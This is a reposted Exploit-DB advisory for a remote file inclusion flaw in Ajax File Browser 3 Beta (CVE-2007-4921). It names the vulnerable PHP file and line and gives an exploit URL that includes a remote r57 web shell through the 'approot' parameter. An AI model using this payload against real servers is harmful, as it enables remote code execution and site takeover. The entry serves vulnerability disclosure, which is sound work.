- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4405
- Проверка EDB
-
- Пройдено
- Автор
- ARFIS PROJECT
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-4921
- Дата публикации
- 2007-09-14
Код:
Ajax File Browser 3 Beta Remote File Inclusion
##############################################
found by the "arfis project"
http://arfis.wordpress.com/
Project Info:
-------------
Name: Ajax File Browser
Link: http://sourceforge.net/projects/ajaxfb/
DL: http://surfnet.dl.sourceforge.net/sourceforge/ajaxfb/afb-3-beta-2007-08-28.zip
Vulnerability Info:
-------------------
File: _includes/settings.inc.php
Line: 12
Code: require_once($approot. _includes/functions_file.inc.php );
Exploit Example:
----------------
http://localhost/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://localhost/r57.txt?
About arfis:
------------
"arfis" stands for "automated Remote File Inclusion search". It's a perl script
that automatically download and extract PHP projects from sourceforge.net. It then
checks the project for RFI vulnerabilities, if found one it post's it to the arfis-
blog, or database if you want to call it like that. Feel free to come around and
find your own RFI:
http://arfis.wordpress.com/
# milw0rm.com [2007-09-14]- Источник
- www.exploit-db.com
